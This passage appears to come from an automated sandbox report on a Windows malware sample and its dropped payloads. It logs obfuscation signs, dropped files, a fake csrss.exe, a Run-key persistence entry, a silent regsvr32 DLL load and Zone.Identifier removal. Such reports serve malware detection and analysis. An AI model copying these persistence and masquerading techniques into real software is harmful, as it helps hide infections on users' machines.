                      Source: C:\Users\user\Desktop\987123.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: Binary string: spelling_bythe_rules_of_language.pdb source: 9D1E.exe, 00000019.00000000.2171928326.0000000000FB2000.00000002.00000001.01000000.0000000C.sdmp, WERA42F.tmp.dmp.29.dr
                      Source: Binary string: WindowsFormsApp2.pdb source: E35F.exe, 0000001E.00000000.2271500419.0000000000D32000.00000002.00000001.01000000.00000011.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb;( source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: WindowsFormsApp9.pdbH source: E35F.exe, 0000001E.00000000.2271500419.0000000000D32000.00000002.00000001.01000000.00000011.sdmp
                      Source: Binary string: mscorlib.pdb source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: 9D1E.exe, 00000019.00000002.2407029205.000000006F8F4000.00000002.00000001.01000000.0000000F.sdmp, 9D1E.exe, 00000019.00000002.2382443256.0000000006041000.00000004.00000800.00020000.00000000.sdmp, 9D1E.exe, 00000019.00000002.2303391732.00000000055ED000.00000004.00000800.00020000.00000000.sdmp, 9D1E.exe, 00000019.00000002.2394782575.00000000075E0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: C:\budipi\jewicayemodu-nolu\19\rehoha75\loz-ru.pdb source: 4577.exe, 0000000D.00000002.2101175658.00000000005C5000.00000002.00000001.01000000.00000009.sdmp, 4577.exe, 0000000D.00000000.1954389234.00000000005C5000.00000002.00000001.01000000.00000009.sdmp, 4577.exe, 00000018.00000000.2100150075.00000000005C5000.00000002.00000001.01000000.00000009.sdmp, csrss.exe, 0000001F.00000002.2468399681.00000000005C5000.00000002.00000001.01000000.00000012.sdmp, csrss.exe, 0000001F.00000000.2280554714.00000000005C5000.00000002.00000001.01000000.00000012.sdmp, csrss.exe, 00000026.00000000.2463066301.00000000005C5000.00000002.00000001.01000000.00000012.sdmp
                      Source: Binary string: WindowsFormsApp2.pdbx source: E35F.exe, 0000001E.00000000.2271500419.0000000000D32000.00000002.00000001.01000000.00000011.sdmp
                      Source: Binary string: mscorlib.ni.pdb source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: khZ:\7zsfxmm-51139022f6d790da60884077b63b2f265052be0b\Output\Win32\7ZSfxMod.pdb source: 3BD2.exe, 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmp, 3BD2.exe, 00000008.00000000.1930010886.0000000000426000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: System.pdb4 source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: System.Core.pdb source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: Z:\7zsfxmm-51139022f6d790da60884077b63b2f265052be0b\Output\Win32\7ZSfxMod.pdb source: 3BD2.exe, 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmp, 3BD2.exe, 00000008.00000000.1930010886.0000000000426000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: 9D1E.exe, 00000019.00000002.2394782575.000000000769A000.00000004.08000000.00040000.00000000.sdmp, 9D1E.exe, 00000019.00000002.2382443256.00000000060FB000.00000004.00000800.00020000.00000000.sdmp, 9D1E.exe, 00000019.00000002.2303391732.000000000551E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: WindowsFormsApp9.pdb source: E35F.exe, 0000001E.00000000.2271500419.0000000000D32000.00000002.00000001.01000000.00000011.sdmp
                      Source: Binary string: System.ni.pdb source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: System.pdb source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: spelling_bythe_rules_of_language.pdbX source: 9D1E.exe, 00000019.00000000.2171928326.0000000000FB2000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: System.Core.ni.pdb source: WERA42F.tmp.dmp.29.dr

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\987123.exeUnpacked PE file: 0.2.987123.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.dag:W;.muce:W;.rsrc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwUnpacked PE file: 3.2.ufhjbuw.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.dag:W;.muce:W;.rsrc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwUnpacked PE file: 34.2.ufhjbuw.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.dag:W;.muce:W;.rsrc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Local\Temp\5390.exeUnpacked PE file: 35.2.5390.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.fidox:W;.zope:W;.rsrc:R; vs .text:EW;
                      Source: E35F.exe.1.dr, --.cs.Net Code: Type.GetTypeFromHandle(_0094_0087._0088_009E_008A(16777334)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(_0094_0087._0088_009E_008A(16777271)),Type.GetTypeFromHandle(_0094_0087._0088_009E_008A(16777268))})
                      Source: 9D1E.exe.1.drStatic PE information: 0xF808E8DA [Sun Nov 13 13:57:46 2101 UTC]
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_0040D915 LoadLibraryA,GetProcAddress,InterlockedExchange,FreeLibrary,0_2_0040D915
                      Source: 9D1E.exe.1.drStatic PE information: real checksum: 0x50c6fc should be: 0x50ff25
                      Source: 1600.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x4820e0
                      Source: 2DF.exe.1.drStatic PE information: real checksum: 0x43967 should be: 0x73319
                      Source: Zoo.8.drStatic PE information: real checksum: 0x110b76 should be: 0x35982
                      Source: FD8E.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x67d7e5
                      Source: 3BD2.exe.1.drStatic PE information: real checksum: 0x13c0c6 should be: 0x13bd73
                      Source: E35F.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x19e64a
                      Source: 987123.exeStatic PE information: section name: .dag
                      Source: 987123.exeStatic PE information: section name: .muce
                      Source: 35E5.dll.1.drStatic PE information: section name: hvwba
                      Source: 35E5.dll.1.drStatic PE information: section name: D
                      Source: 35E5.dll.1.drStatic PE information: section name: CONST
                      Source: 35E5.dll.1.drStatic PE information: section name: .qdata
                      Source: 2DF.exe.1.drStatic PE information: section name: fkgjuy7
                      Source: 5390.exe.1.drStatic PE information: section name: .fidox
                      Source: 5390.exe.1.drStatic PE information: section name: .zope
                      Source: wehjbuw.1.drStatic PE information: section name: .fidox
                      Source: wehjbuw.1.drStatic PE information: section name: .zope
                      Source: ufhjbuw.1.drStatic PE information: section name: .dag
                      Source: ufhjbuw.1.drStatic PE information: section name: .muce
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\35E5.dll
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_00403253 push eax; ret 0_2_0040332D
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_00401C64 push es; retf 0_2_00401C83
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_0040332A push eax; ret 0_2_0040332D
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_00402F91 push 60B44389h; retf 0_2_00402FAB
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_0040C822 push esi; ret 0_2_0040C824
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_00721CCB push es; retf 0_2_00721CEA
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_00722FF8 push 60B44389h; retf 0_2_00723012
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_00403253 push eax; ret 3_2_0040332D
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_00401C64 push es; retf 3_2_00401C83
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_0040332A push eax; ret 3_2_0040332D
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_00402F91 push 60B44389h; retf 3_2_00402FAB
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_0040C822 push esi; ret 3_2_0040C824
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_004C1CCB push es; retf 3_2_004C1CEA
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_004C2FF8 push 60B44389h; retf 3_2_004C3012
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0041A2D6 push ecx; ret 8_2_0041A2E9
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00419DC4 push eax; ret 8_2_00419DE2
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeCode function: 13_2_028E54BD push cs; ret 13_2_028E54BE
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeCode function: 13_2_028AD7ED push ebp; retf 13_2_028AD7EE
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeCode function: 13_2_028E57F8 push edx; retf 13_2_028E57F9
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeCode function: 13_2_028AD80A push 5A36841Dh; retf 13_2_028AD825
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeCode function: 13_2_0284770A pushad ; ret 13_2_0284770C
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeCode function: 13_2_027F32EF push ebx; iretd 13_2_027F32F7
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_3_00000260E1153CA4 pushad ; retf 21_3_00000260E1153CA9
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_3_00000260E115895A pushad ; retf 21_3_00000260E1158961
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D077DAD push rdi; ret 21_2_00007FF73D077DB4
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D077849 push rdi; ret 21_2_00007FF73D077852
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.3353810606741625
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.997373535915437
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.337722256745041
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.337722256745041
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.3353810606741625
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.997373535915437

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeFile created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E35F.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wehjbuwJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeFile created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeFile created: C:\Users\user\AppData\Local\Temp\InstallSetup9.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9D1E.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ufhjbuwJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1600.exeFile created: C:\Users\user\AppData\Local\Temp\is-K8FH3.tmp\1600.tmpJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FD8E.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2DF.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\35E5.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4577.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5390.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1600.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ZooJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3BD2.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1600.exeFile created: C:\Users\user\AppData\Local\Temp\is-9S7V0.tmp\1600.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wehjbuwJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ufhjbuwJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ZooJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSS
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSS

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\987123.exeJump to behavior
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ufhjbuw:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\wehjbuw:Zone.Identifier read attributes | deleteJump to behavior
                      Source: 4577.exe, 00000018.00000002.2986069883.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000026.00000002.2986522634.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: onion-port
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 8990
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8990 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8990 -> 49797
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0E8DA4 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,21_2_00007FF73D0E8DA4
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D06433C GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,21_2_00007FF73D06433C
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
